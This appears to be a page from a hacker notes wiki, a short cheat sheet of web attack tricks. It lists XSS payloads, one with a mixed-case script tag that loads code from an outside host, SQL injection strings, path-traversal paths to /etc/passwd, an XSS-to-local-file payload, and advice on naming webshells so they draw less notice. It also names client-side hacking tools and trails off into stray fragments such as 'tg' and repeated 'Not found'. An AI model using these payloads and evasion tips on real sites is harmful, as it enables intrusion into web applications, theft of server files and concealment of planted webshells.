Follow Simple Rules

Stop using alert('xss').You should now use prompt('xss').
Dont do <script>. Do <ScRIPT x src=//0x.lv?
For blind SQL injections. Stop using ' or 1=1--. Use ' or 2=2--.
For SQL injections. Stop using UNION SELECT. Use UNION ALL SELECT.
Don’t do /etc/passwd. Do /foo/../etc/bar/../passwd.
Don’t call your webshell c99.php, shell.aspx or cmd.jsp Call it rofl.php.

XSS to LFi

<script>document.write(%27<iframe%20src=file:///etc/passwd></iframe>%27);</script>
tg

xss extentions

The client-side hackers toolkit:

1 DevTools
2 DOM Logger++
3 DOM Invader or EvalVillian
4 https://de4js.kshift.me
5 Humanify
6 JSWZL
 <script>alert(1)</script>
Not found
Not found
Not found
PreviousPAK VDPNextBurp Match and Replace Rules

Last updated